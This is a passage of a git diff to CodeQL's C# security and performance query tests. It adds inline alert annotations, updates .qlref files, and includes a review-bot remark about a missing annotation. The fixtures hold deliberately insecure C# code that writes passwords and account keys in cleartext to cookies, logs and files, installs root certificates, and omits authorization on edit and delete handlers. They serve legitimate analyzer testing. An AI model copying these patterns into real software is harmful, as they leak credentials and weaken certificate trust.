dict[1] : dict[1]; // $ Alert // GOOD: Different index if (dict.ContainsKey(0)) x = dict[1]; diff --git a/csharp/ql/test/query-tests/Performance/UseTryGetValue/UseTryGetValue.qlref b/csharp/ql/test/query-tests/Performance/UseTryGetValue/UseTryGetValue.qlref index 13889c6245fc..5ca355f78242 100644 --- a/csharp/ql/test/query-tests/Performance/UseTryGetValue/UseTryGetValue.qlref +++ b/csharp/ql/test/query-tests/Performance/UseTryGetValue/UseTryGetValue.qlref @@ -1 +1,2 @@ -Performance/UseTryGetValue.ql \ No newline at end of file +query: Performance/UseTryGetValue.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/ReadOnlyContainer/ReadOnlyContainer.cs b/csharp/ql/test/query-tests/ReadOnlyContainer/ReadOnlyContainer.cs index f9914566bb98..b6b5c5639e00 100644 --- a/csharp/ql/test/query-tests/ReadOnlyContainer/ReadOnlyContainer.cs 
+++ b/csharp/ql/test/query-tests/ReadOnlyContainer/ReadOnlyContainer.cs @@ -6,11 +6,11 @@ class Test { // Test variable scope - IList v1 = new List(); // BAD: private scope + IList v1 = new List(); // BAD: private scope // $ Alert void f() { - var v2 = new List(); // BAD: local scope + var v2 = new List(); // BAD: local scope // $ Alert var x = v1.Contains(1); var y = v2.Contains(2); } @@ -27,7 +27,7 @@ void g() // Test initializer IList n3 = new List { 1, 2, 3 }; // GOOD: initialized - IList v3; // BAD: unassigned + IList v3; // BAD: unassigned // $ Alert void h() { @@ -52,7 +52,7 @@ void f1() n5 = new List { 1, 2, 3 }; n5.Contains(1); - var v4 = new List(); // BAD: assigned only from empty list + var v4 = new List(); // BAD: assigned only from empty list // $ Alert v4 = new List(); v4.Contains(1); @@ -73,30 +73,30 @@ void f3() void f4() { - var v5 = new Dictionary(); // BAD + var v5 = new Dictionary(); // BAD // $ Alert v5.ContainsKey(1); v5.ContainsValue(1); v5.GetEnumerator(); var tmp = new HashSet(); - var v6 = new HashSet(); // BAD + var v6 = new HashSet(); // BAD // $ Alert v6.IsSubsetOf(tmp); v6.IsProperSubsetOf(tmp); v6.IsSupersetOf(tmp); v6.IsProperSupersetOf(tmp); - var v7 = new LinkedList(); // BAD + var v7 = new LinkedList(); // BAD // $ Alert v7.Contains(1); - var v8 = new Queue(); // BAD + var v8 = new Queue(); // BAD // $ Alert v8.Dequeue(); v8.Peek(); v8.ToArray(); - var v9 = new Stack(); // BAD + var v9 = new Stack(); // BAD // $ Alert v9.Pop(); - var v10 = new List(); // BAD: property access + var v10 = new List(); // BAD: property access // $ Alert var x = v10.Count; } @@ -118,7 +118,7 @@ void f5() void f6() { - var v11 = new Dictionary(); // BAD: read by Index + var v11 = new Dictionary(); // BAD: read by Index // $ Alert var x = v11[1]; var n12 = new Dictionary(); // GOOD: written by Index 
@@ -155,7 +155,7 @@ void f8(object arguments) void f9() { - var l1 = new MyList(); // BAD + var l1 = new MyList(); // BAD // $ Alert var x1 = l1[0]; var l2 = new MyList(); // GOOD diff --git a/csharp/ql/test/query-tests/ReadOnlyContainer/ReadOnlyContainer.qlref b/csharp/ql/test/query-tests/ReadOnlyContainer/ReadOnlyContainer.qlref index 2f4f5248a6bb..623d63c75056 100644 --- a/csharp/ql/test/query-tests/ReadOnlyContainer/ReadOnlyContainer.qlref +++ b/csharp/ql/test/query-tests/ReadOnlyContainer/ReadOnlyContainer.qlref @@ -1 +1,2 @@ -Likely Bugs/Collections/ReadOnlyContainer.ql \ No newline at end of file +query: Likely Bugs/Collections/ReadOnlyContainer.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-011/ASPNetDebug.qlref b/csharp/ql/test/query-tests/Security Features/CWE-011/ASPNetDebug.qlref index da2dbc17be05..f7d09f0bf5cd 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-011/ASPNetDebug.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-011/ASPNetDebug.qlref @@ -1 +1 @@ -Security Features/CWE-011/ASPNetDebug.ql \ No newline at end of file +query: Security Features/CWE-011/ASPNetDebug.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetMaxRequestLength/ASPNetMaxRequestLength.qlref b/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetMaxRequestLength/ASPNetMaxRequestLength.qlref index 7469d5d2e98a..a2914c126c3c 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetMaxRequestLength/ASPNetMaxRequestLength.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetMaxRequestLength/ASPNetMaxRequestLength.qlref @@ -1 +1 @@ -Security Features/CWE-016/ASPNetMaxRequestLength.ql \ No newline at end of file +query: Security Features/CWE-016/ASPNetMaxRequestLength.ql 
diff --git a/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetPagesValidateRequest/ASPNetPagesValidateRequest.qlref b/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetPagesValidateRequest/ASPNetPagesValidateRequest.qlref
index 2116949f754e..f2d275efd563 100644
--- a/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetPagesValidateRequest/ASPNetPagesValidateRequest.qlref
+++ b/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetPagesValidateRequest/ASPNetPagesValidateRequest.qlref
@@ -1 +1 @@
-Security Features/CWE-016/ASPNetPagesValidateRequest.ql
\ No newline at end of file
+query: Security Features/CWE-016/ASPNetPagesValidateRequest.ql
diff --git a/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetRequestValidationMode/ASPNetRequestValidationMode.qlref b/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetRequestValidationMode/ASPNetRequestValidationMode.qlref
index 86ac50728428..e38b59c5c75a 100644
--- a/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetRequestValidationMode/ASPNetRequestValidationMode.qlref
+++ b/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetRequestValidationMode/ASPNetRequestValidationMode.qlref
@@ -1 +1 @@
-Security Features/CWE-016/ASPNetRequestValidationMode.ql
\ No newline at end of file
+query: Security Features/CWE-016/ASPNetRequestValidationMode.ql
diff --git a/csharp/ql/test/query-tests/Security Features/CWE-020/ExternalAPIsUsedWithUntrustedData.qlref b/csharp/ql/test/query-tests/Security Features/CWE-020/ExternalAPIsUsedWithUntrustedData.qlref
index 68f234e9d372..44a26f7eb0f4 100644
--- a/csharp/ql/test/query-tests/Security Features/CWE-020/ExternalAPIsUsedWithUntrustedData.qlref
+++ b/csharp/ql/test/query-tests/Security Features/CWE-020/ExternalAPIsUsedWithUntrustedData.qlref
@@ -1 +1 @@
-Security Features/CWE-020/ExternalAPIsUsedWithUntrustedData.ql
\ No newline at end of file
+query: Security Features/CWE-020/ExternalAPIsUsedWithUntrustedData.ql
diff --git a/csharp/ql/test/query-tests/Security Features/CWE-020/RuntimeChecksBypass.cs b/csharp/ql/test/query-tests/Security Features/CWE-020/RuntimeChecksBypass.cs index aea3c4e244f8..2298e14e1476 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-020/RuntimeChecksBypass.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-020/RuntimeChecksBypass.cs @@ -17,7 +17,7 @@ public Test1(string v) [OnDeserializing] public void Deserialize() { - f = GetString(); // BAD, non-constant and non-object creation expr + f = GetString(); // BAD, non-constant and non-object creation expr // $ Alert } string GetString() { throw null; } @@ -123,7 +123,7 @@ public Test5(int age) [OnDeserializing] void ISerializable.GetObjectData(SerializationInfo info, StreamingContext context) { - Age = info.GetInt32("age"); // BAD + Age = info.GetInt32("age"); // BAD // $ Alert } } @@ -167,7 +167,7 @@ void ISerializable.GetObjectData(SerializationInfo info, StreamingContext contex int age = info.GetInt32("age"); if (false) throw new SerializationException("age"); - Age = age; // BAD + Age = age; // BAD // $ Alert } } diff --git a/csharp/ql/test/query-tests/Security Features/CWE-020/RuntimeChecksBypassBad.cs b/csharp/ql/test/query-tests/Security Features/CWE-020/RuntimeChecksBypassBad.cs index 5d89942f9fe8..ad81a39a9f92 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-020/RuntimeChecksBypassBad.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-020/RuntimeChecksBypassBad.cs @@ -16,6 +16,6 @@ public PersonBad(int age) [OnDeserializing] void ISerializable.GetObjectData(SerializationInfo info, StreamingContext context) { - Age = info.GetInt32("age"); // BAD - write is unsafe + Age = info.GetInt32("age"); // BAD - write is unsafe // $ Alert } } diff --git a/csharp/ql/test/query-tests/Security Features/CWE-020/RuntimeChecksbypass.qlref b/csharp/ql/test/query-tests/Security Features/CWE-020/RuntimeChecksbypass.qlref index c5615a7415c4..375a7f00e550 100644 
--- a/csharp/ql/test/query-tests/Security Features/CWE-020/RuntimeChecksbypass.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-020/RuntimeChecksbypass.qlref @@ -1 +1,2 @@ -Security Features/CWE-020/RuntimeChecksBypass.ql \ No newline at end of file +query: Security Features/CWE-020/RuntimeChecksBypass.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-079/XSSRazorPages/XSS.qlref b/csharp/ql/test/query-tests/Security Features/CWE-079/XSSRazorPages/XSS.qlref index faad1d6403c1..e0b85b8f4c6b 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-079/XSSRazorPages/XSS.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-079/XSSRazorPages/XSS.qlref @@ -1 +1 @@ -Security Features/CWE-079/XSS.ql \ No newline at end of file +query: Security Features/CWE-079/XSS.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-119/LocalUnvalidatedArithmetic.cs b/csharp/ql/test/query-tests/Security Features/CWE-119/LocalUnvalidatedArithmetic.cs index 4fc60b899e67..42cc1062c2da 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-119/LocalUnvalidatedArithmetic.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-119/LocalUnvalidatedArithmetic.cs @@ -14,7 +14,7 @@ public unsafe void CalcPointer(PossiblyOverridableClass possiblyOverridable, cha fixed (char* charPointer = charArray) { // BAD: Unvalidate use in pointer arithmetic - char* newCharPointer = charPointer + possiblyOverridable.getNumber(); + char* newCharPointer = charPointer + possiblyOverridable.getNumber(); // $ Alert *newCharPointer = 'A'; // BAD: Unvalidate use in pointer arithmetic int number = possiblyOverridable.getNumber(); diff --git a/csharp/ql/test/query-tests/Security Features/CWE-119/LocalUnvalidatedArithmetic.qlref b/csharp/ql/test/query-tests/Security Features/CWE-119/LocalUnvalidatedArithmetic.qlref index c6b75e927954..13eea010dbe7 100644 
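Review bot: The second `// BAD: Unvalidate use in pointer arithmetic` case in LocalUnvalidatedArithmetic.cs, the one that first stores `possiblyOverridable.getNumber()` in `number`, gets no inline expectation, while the paired .qlref now runs `utils/test/InlineExpectationsTestQuery.ql`. This is the only hunk shown for the file and it ends at the `int number = ...` line, so the pointer arithmetic that uses `number` lies outside the hunk and appears to be left unannotated. If the query reports that use, the line needs `// $ Alert` as well; if it is a known false negative, mark it `// $ MISSING: Alert` so the gap in CWE-119 coverage is recorded by the test rather than implied by a comment.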
--- a/csharp/ql/test/query-tests/Security Features/CWE-119/LocalUnvalidatedArithmetic.qlref
+++ b/csharp/ql/test/query-tests/Security Features/CWE-119/LocalUnvalidatedArithmetic.qlref
@@ -1 +1,2 @@
-Security Features/CWE-119/LocalUnvalidatedArithmetic.ql
\ No newline at end of file
+query: Security Features/CWE-119/LocalUnvalidatedArithmetic.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/csharp/ql/test/query-tests/Security Features/CWE-248/MissingASPNETGlobalErrorHandler/WebConfigOff/MissingASPNETGlobalErrorHandler.qlref b/csharp/ql/test/query-tests/Security Features/CWE-248/MissingASPNETGlobalErrorHandler/WebConfigOff/MissingASPNETGlobalErrorHandler.qlref
index fa43c8d49bec..f496f14153c6 100644
--- a/csharp/ql/test/query-tests/Security Features/CWE-248/MissingASPNETGlobalErrorHandler/WebConfigOff/MissingASPNETGlobalErrorHandler.qlref
+++ b/csharp/ql/test/query-tests/Security Features/CWE-248/MissingASPNETGlobalErrorHandler/WebConfigOff/MissingASPNETGlobalErrorHandler.qlref
@@ -1 +1 @@
-Security Features/CWE-248/MissingASPNETGlobalErrorHandler.ql
\ No newline at end of file
+query: Security Features/CWE-248/MissingASPNETGlobalErrorHandler.ql
diff --git a/csharp/ql/test/query-tests/Security Features/CWE-248/MissingASPNETGlobalErrorHandler/WebConfigOffButGlobal/MissingASPNETGlobalErrorHandler.qlref b/csharp/ql/test/query-tests/Security Features/CWE-248/MissingASPNETGlobalErrorHandler/WebConfigOffButGlobal/MissingASPNETGlobalErrorHandler.qlref
index fa43c8d49bec..521ec9079e0e 100644
--- a/csharp/ql/test/query-tests/Security Features/CWE-248/MissingASPNETGlobalErrorHandler/WebConfigOffButGlobal/MissingASPNETGlobalErrorHandler.qlref
+++ b/csharp/ql/test/query-tests/Security Features/CWE-248/MissingASPNETGlobalErrorHandler/WebConfigOffButGlobal/MissingASPNETGlobalErrorHandler.qlref
@@ -1 +1,2 @@ -Security Features/CWE-248/MissingASPNETGlobalErrorHandler.ql \ No newline at end of file +query: Security Features/CWE-248/MissingASPNETGlobalErrorHandler.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-285/MissingAccessControl/WebFormsTests/MissingAccessControl.qlref b/csharp/ql/test/query-tests/Security Features/CWE-285/MissingAccessControl/WebFormsTests/MissingAccessControl.qlref index a4173778d9fa..8bfd3b626d1f 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-285/MissingAccessControl/WebFormsTests/MissingAccessControl.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-285/MissingAccessControl/WebFormsTests/MissingAccessControl.qlref @@ -1 +1,2 @@ -Security Features/CWE-285/MissingAccessControl.ql +query: Security Features/CWE-285/MissingAccessControl.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-285/MissingAccessControl/WebFormsTests/Test1/EditProfile.aspx.cs b/csharp/ql/test/query-tests/Security Features/CWE-285/MissingAccessControl/WebFormsTests/Test1/EditProfile.aspx.cs index b023dc11e80f..cf1be0cfbfea 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-285/MissingAccessControl/WebFormsTests/Test1/EditProfile.aspx.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-285/MissingAccessControl/WebFormsTests/Test1/EditProfile.aspx.cs @@ -7,7 +7,7 @@ private void doThings() { } private bool isAuthorized() { return false; } // BAD: The class name indicates that this may be an Edit method, but there is no auth check - protected void btn1_Click(object sender, EventArgs e) { + protected void btn1_Click(object sender, EventArgs e) { // $ Alert doThings(); } 
diff --git a/csharp/ql/test/query-tests/Security Features/CWE-285/MissingAccessControl/WebFormsTests/Test1/ViewProfile.aspx.cs b/csharp/ql/test/query-tests/Security Features/CWE-285/MissingAccessControl/WebFormsTests/Test1/ViewProfile.aspx.cs index f9d7316d50b2..4ed7b777d2bf 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-285/MissingAccessControl/WebFormsTests/Test1/ViewProfile.aspx.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-285/MissingAccessControl/WebFormsTests/Test1/ViewProfile.aspx.cs @@ -11,7 +11,7 @@ protected void btn_safe_Click(object sender, EventArgs e) { } // BAD: The name indicates a Delete method, but no auth is present. - protected void btn_delete1_Click(object sender, EventArgs e) { + protected void btn_delete1_Click(object sender, EventArgs e) { // $ Alert doThings(); } diff --git a/csharp/ql/test/query-tests/Security Features/CWE-285/MissingAccessControl/WebFormsTests/Test3/B/EditProfile.aspx.cs b/csharp/ql/test/query-tests/Security Features/CWE-285/MissingAccessControl/WebFormsTests/Test3/B/EditProfile.aspx.cs index 4b7697f0f88d..13b9f4dd5b5e 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-285/MissingAccessControl/WebFormsTests/Test3/B/EditProfile.aspx.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-285/MissingAccessControl/WebFormsTests/Test3/B/EditProfile.aspx.cs @@ -5,7 +5,7 @@ class EditProfile4 : System.Web.UI.Page { private void doThings() { } // BAD: The Web.config file does not specify auth for this path. - protected void btn1_Click(object sender, EventArgs e) { + protected void btn1_Click(object sender, EventArgs e) { // $ Alert doThings(); } } \ No newline at end of file diff --git a/csharp/ql/test/query-tests/Security Features/CWE-312/CleartextStorage.cs b/csharp/ql/test/query-tests/Security Features/CWE-312/CleartextStorage.cs index 74a5568b6683..322d755f4ed5 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-312/CleartextStorage.cs 
+++ b/csharp/ql/test/query-tests/Security Features/CWE-312/CleartextStorage.cs @@ -12,10 +12,10 @@ public class ClearTextStorageHandler : IHttpHandler public void ProcessRequest(HttpContext ctx) { // BAD: Setting a cookie value or values with sensitive data. - ctx.Response.Cookies["MyCookie"].Value = accountKey; - ctx.Response.Cookies["MyOtherCookie"]["Sensitive"] = GetPassword(); - ctx.Response.Cookies["MyOtherCookie"].Values["Sensitive"] = GetPassword(); - ctx.Response.Cookies["MyCookie"].Value = GetAccountID(); + ctx.Response.Cookies["MyCookie"].Value = accountKey; // $ Alert + ctx.Response.Cookies["MyOtherCookie"]["Sensitive"] = GetPassword(); // $ Alert + ctx.Response.Cookies["MyOtherCookie"].Values["Sensitive"] = GetPassword(); // $ Alert + ctx.Response.Cookies["MyCookie"].Value = GetAccountID(); // $ Alert // GOOD: Encoding the value before setting it. ctx.Response.Cookies["MyCookie"].Value = Encode(accountKey, "Account key"); @@ -23,7 +23,7 @@ public void ProcessRequest(HttpContext ctx) ctx.Response.Cookies["MyCookie"].Value = GetAccountName(); ILogger logger = new ILogger(); // BAD: Logging sensitive data - logger.Warn(GetPassword()); + logger.Warn(GetPassword()); // $ Alert // GOOD: Logging encrypted sensitive data logger.Warn(Encode(GetPassword(), "Password")); @@ -31,7 +31,7 @@ public void ProcessRequest(HttpContext ctx) using (var writeStream = File.Open("passwords.txt", FileMode.Create)) { var writer = new StreamWriter(writeStream); - writer.Write(GetPassword()); + writer.Write(GetPassword()); // $ Alert writer.Close(); } @@ -91,9 +91,9 @@ public void OnButtonClicked() { box1.PasswordChar = '*'; box2.UseSystemPasswordChar = true; - logger.Warn(password.Text); // BAD - logger.Warn(box1.Text); // BAD - logger.Warn(box2.Text); // BAD + logger.Warn(password.Text); // BAD // $ Alert + logger.Warn(box1.Text); // BAD // $ Alert + logger.Warn(box2.Text); // BAD // $ Alert logger.Warn(box3.Text); // GOOD } } 
diff --git a/csharp/ql/test/query-tests/Security Features/CWE-312/CleartextStorage.expected b/csharp/ql/test/query-tests/Security Features/CWE-312/CleartextStorage.expected
index 74b546faa65f..b7daaaf26e7f 100644
--- a/csharp/ql/test/query-tests/Security Features/CWE-312/CleartextStorage.expected
+++ b/csharp/ql/test/query-tests/Security Features/CWE-312/CleartextStorage.expected
@@ -1,3 +1,13 @@ +#select +| CleartextStorage.cs:15:50:15:59 | access to field accountKey | CleartextStorage.cs:15:50:15:59 | access to field accountKey | CleartextStorage.cs:15:50:15:59 | access to field accountKey | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:15:50:15:59 | access to field accountKey | access to field accountKey | +| CleartextStorage.cs:16:62:16:74 | call to method GetPassword | CleartextStorage.cs:16:62:16:74 | call to method GetPassword | CleartextStorage.cs:16:62:16:74 | call to method GetPassword | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:16:62:16:74 | call to method GetPassword | call to method GetPassword | +| CleartextStorage.cs:17:69:17:81 | call to method GetPassword | CleartextStorage.cs:17:69:17:81 | call to method GetPassword | CleartextStorage.cs:17:69:17:81 | call to method GetPassword | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:17:69:17:81 | call to method GetPassword | call to method GetPassword | +| CleartextStorage.cs:18:50:18:63 | call to method GetAccountID | CleartextStorage.cs:18:50:18:63 | call to method GetAccountID | CleartextStorage.cs:18:50:18:63 | call to method GetAccountID | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:18:50:18:63 | call to method GetAccountID | call to method GetAccountID | +| CleartextStorage.cs:26:21:26:33 | call to method GetPassword | CleartextStorage.cs:26:21:26:33 | call to method GetPassword | CleartextStorage.cs:26:21:26:33 | call to method GetPassword | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:26:21:26:33 | call to method GetPassword | call to method GetPassword | +| CleartextStorage.cs:34:26:34:38 | call to method GetPassword | CleartextStorage.cs:34:26:34:38 | call to method GetPassword | CleartextStorage.cs:34:26:34:38 | call to method GetPassword | This stores sensitive data returned by $@ as clear text. 
| CleartextStorage.cs:34:26:34:38 | call to method GetPassword | call to method GetPassword | +| CleartextStorage.cs:94:21:94:33 | access to property Text | CleartextStorage.cs:94:21:94:33 | access to property Text | CleartextStorage.cs:94:21:94:33 | access to property Text | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:94:21:94:33 | access to property Text | access to property Text | +| CleartextStorage.cs:95:21:95:29 | access to property Text | CleartextStorage.cs:95:21:95:29 | access to property Text | CleartextStorage.cs:95:21:95:29 | access to property Text | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:95:21:95:29 | access to property Text | access to property Text | +| CleartextStorage.cs:96:21:96:29 | access to property Text | CleartextStorage.cs:96:21:96:29 | access to property Text | CleartextStorage.cs:96:21:96:29 | access to property Text | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:96:21:96:29 | access to property Text | access to property Text | edges nodes | CleartextStorage.cs:15:50:15:59 | access to field accountKey | semmle.label | access to field accountKey | 
@@ -10,13 +20,3 @@ nodes | CleartextStorage.cs:95:21:95:29 | access to property Text | semmle.label | access to property Text | | CleartextStorage.cs:96:21:96:29 | access to property Text | semmle.label | access to property Text | subpaths -#select -| CleartextStorage.cs:15:50:15:59 | access to field accountKey | CleartextStorage.cs:15:50:15:59 | access to field accountKey | CleartextStorage.cs:15:50:15:59 | access to field accountKey | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:15:50:15:59 | access to field accountKey | access to field accountKey | -| CleartextStorage.cs:16:62:16:74 | call to method GetPassword | CleartextStorage.cs:16:62:16:74 | call to method GetPassword | CleartextStorage.cs:16:62:16:74 | call to method GetPassword | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:16:62:16:74 | call to method GetPassword | call to method GetPassword | -| CleartextStorage.cs:17:69:17:81 | call to method GetPassword | CleartextStorage.cs:17:69:17:81 | call to method GetPassword | CleartextStorage.cs:17:69:17:81 | call to method GetPassword | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:17:69:17:81 | call to method GetPassword | call to method GetPassword | -| CleartextStorage.cs:18:50:18:63 | call to method GetAccountID | CleartextStorage.cs:18:50:18:63 | call to method GetAccountID | CleartextStorage.cs:18:50:18:63 | call to method GetAccountID | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:18:50:18:63 | call to method GetAccountID | call to method GetAccountID | -| CleartextStorage.cs:26:21:26:33 | call to method GetPassword | CleartextStorage.cs:26:21:26:33 | call to method GetPassword | CleartextStorage.cs:26:21:26:33 | call to method GetPassword | This stores sensitive data returned by $@ as clear text. 
| CleartextStorage.cs:26:21:26:33 | call to method GetPassword | call to method GetPassword | -| CleartextStorage.cs:34:26:34:38 | call to method GetPassword | CleartextStorage.cs:34:26:34:38 | call to method GetPassword | CleartextStorage.cs:34:26:34:38 | call to method GetPassword | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:34:26:34:38 | call to method GetPassword | call to method GetPassword | -| CleartextStorage.cs:94:21:94:33 | access to property Text | CleartextStorage.cs:94:21:94:33 | access to property Text | CleartextStorage.cs:94:21:94:33 | access to property Text | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:94:21:94:33 | access to property Text | access to property Text | -| CleartextStorage.cs:95:21:95:29 | access to property Text | CleartextStorage.cs:95:21:95:29 | access to property Text | CleartextStorage.cs:95:21:95:29 | access to property Text | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:95:21:95:29 | access to property Text | access to property Text | -| CleartextStorage.cs:96:21:96:29 | access to property Text | CleartextStorage.cs:96:21:96:29 | access to property Text | CleartextStorage.cs:96:21:96:29 | access to property Text | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:96:21:96:29 | access to property Text | access to property Text | diff --git a/csharp/ql/test/query-tests/Security Features/CWE-312/CleartextStorage.qlref b/csharp/ql/test/query-tests/Security Features/CWE-312/CleartextStorage.qlref index 0fda4720f54a..78dc420e9c8e 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-312/CleartextStorage.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-312/CleartextStorage.qlref @@ -1 +1,2 @@ -Security Features/CWE-312/CleartextStorage.ql \ No newline at end of file +query: Security Features/CWE-312/CleartextStorage.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/csharp/ql/test/query-tests/Security Features/CWE-327/DontInstallRootCert/DontInstallRootCert.expected b/csharp/ql/test/query-tests/Security Features/CWE-327/DontInstallRootCert/DontInstallRootCert.expected index a6c8142e7d94..e7724d5d586b 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-327/DontInstallRootCert/DontInstallRootCert.expected +++ b/csharp/ql/test/query-tests/Security Features/CWE-327/DontInstallRootCert/DontInstallRootCert.expected @@ -1,3 +1,7 @@ +#select +| Test.cs:18:13:18:17 | access to local variable store | Test.cs:15:31:15:59 | object creation of type X509Store : X509Store | Test.cs:18:13:18:17 | access to local variable store | This certificate is added to the root certificate store. | +| Test.cs:28:13:28:17 | access to local variable store | Test.cs:25:31:25:86 | object creation of type X509Store : X509Store | Test.cs:28:13:28:17 | access to local variable store | This certificate is added to the root certificate store. | +| Test.cs:73:13:73:17 | access to local variable store | Test.cs:70:31:70:86 | object creation of type X509Store : X509Store | Test.cs:73:13:73:17 | access to local variable store | This certificate is added to the root certificate store. | edges | Test.cs:15:23:15:27 | access to local variable store : X509Store | Test.cs:18:13:18:17 | access to local variable store | provenance | | | Test.cs:15:31:15:59 | object creation of type X509Store : X509Store | Test.cs:15:23:15:27 | access to local variable store : X509Store | provenance | | 
@@ -16,7 +20,3 @@ nodes | Test.cs:70:31:70:86 | object creation of type X509Store : X509Store | semmle.label | object creation of type X509Store : X509Store | | Test.cs:73:13:73:17 | access to local variable store | semmle.label | access to local variable store | subpaths -#select -| Test.cs:18:13:18:17 | access to local variable store | Test.cs:15:31:15:59 | object creation of type X509Store : X509Store | Test.cs:18:13:18:17 | access to local variable store | This certificate is added to the root certificate store. | -| Test.cs:28:13:28:17 | access to local variable store | Test.cs:25:31:25:86 | object creation of type X509Store : X509Store | Test.cs:28:13:28:17 | access to local variable store | This certificate is added to the root certificate store. | -| Test.cs:73:13:73:17 | access to local variable store | Test.cs:70:31:70:86 | object creation of type X509Store : X509Store | Test.cs:73:13:73:17 | access to local variable store | This certificate is added to the root certificate store. | diff --git a/csharp/ql/test/query-tests/Security Features/CWE-327/DontInstallRootCert/DontInstallRootCert.qlref b/csharp/ql/test/query-tests/Security Features/CWE-327/DontInstallRootCert/DontInstallRootCert.qlref index f023214a7848..da9f5248b379 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-327/DontInstallRootCert/DontInstallRootCert.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-327/DontInstallRootCert/DontInstallRootCert.qlref @@ -1 +1,2 @@ -Security Features/CWE-327/DontInstallRootCert.ql \ No newline at end of file +query: Security Features/CWE-327/DontInstallRootCert.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-327/DontInstallRootCert/Test.cs b/csharp/ql/test/query-tests/Security Features/CWE-327/DontInstallRootCert/Test.cs index 8323889cffdd..1c6e3d5e31ff 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-327/DontInstallRootCert/Test.cs 
+++ b/csharp/ql/test/query-tests/Security Features/CWE-327/DontInstallRootCert/Test.cs @@ -12,20 +12,20 @@ public class Class1 public void InstallRootCert() { string file = "mytest.pfx"; // Contains name of certificate file - X509Store store = new X509Store(StoreName.Root); + X509Store store = new X509Store(StoreName.Root); // $ Source store.Open(OpenFlags.ReadWrite); // BAD: adding a certificate to the Root store - store.Add(new X509Certificate2(X509Certificate2.CreateFromCertFile(file))); + store.Add(new X509Certificate2(X509Certificate2.CreateFromCertFile(file))); // $ Alert store.Close(); } public void InstallRootCert2() { string file = "mytest.pfx"; // Contains name of certificate file - X509Store store = new X509Store(StoreName.Root, StoreLocation.CurrentUser); + X509Store store = new X509Store(StoreName.Root, StoreLocation.CurrentUser); // $ Source store.Open(OpenFlags.ReadWrite); // BAD: adding a certificate to the Root store - store.Add(new X509Certificate2(X509Certificate2.CreateFromCertFile(file))); + store.Add(new X509Certificate2(X509Certificate2.CreateFromCertFile(file))); // $ Alert store.Close(); } @@ -67,10 +67,10 @@ public void InstallRootCertRange() new X509Certificate2(X509Certificate2.CreateFromCertFile(file1)), new X509Certificate2(X509Certificate2.CreateFromCertFile(file2)), }; - X509Store store = new X509Store(StoreName.Root, StoreLocation.CurrentUser); + X509Store store = new X509Store(StoreName.Root, StoreLocation.CurrentUser); // $ Source store.Open(OpenFlags.ReadWrite); // BAD: adding multiple certificates to the Root store - store.AddRange(new X509Certificate2Collection(certCollection)); + store.AddRange(new X509Certificate2Collection(certCollection)); // $ Alert store.Close(); } } diff --git a/csharp/ql/test/query-tests/Security Features/CWE-327/InsecureSQLConnection/InsecureSQLConnection.cs 